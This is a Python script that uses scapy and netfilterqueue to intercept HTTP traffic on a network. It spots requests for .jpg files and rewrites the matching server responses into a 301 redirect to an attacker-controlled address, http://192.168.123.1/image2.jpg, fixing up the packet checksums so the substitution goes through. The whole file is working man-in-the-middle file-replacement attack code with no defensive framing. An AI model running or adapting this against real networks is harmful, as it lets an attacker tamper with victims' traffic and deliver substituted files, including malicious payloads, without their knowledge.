#!/usr/bin/python3.8

import scapy.all as scapy
import netfilterqueue

ack_list = []

def process_packet(packet):
	scapy_packet = scapy.IP(packet.get_payload())
	if scapy_packet.haslayer(scapy.Raw):
		if scapy_packet[scapy.TCP].dport == 80:
			if '.jpg' in str(scapy_packet[scapy.Raw].load):
				ack_list.append(scapy_packet[scapy.TCP].ack)
				print('request')
		elif scapy_packet[scapy.TCP].sport == 80:
			if scapy_packet[scapy.TCP].seq in ack_list:
				scapy_packet.show()
				ack_list.remove(scapy_packet[scapy.TCP].seq)
				print('response')
				scapy_packet[scapy.Raw].load = 'HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.123.1/image2.jpg\n\n'
				del scapy_packet[scapy.IP].len
				del scapy_packet[scapy.IP].chksum
				del scapy_packet[scapy.TCP].chksum
				packet.set_payload(bytes(scapy_packet))

	packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()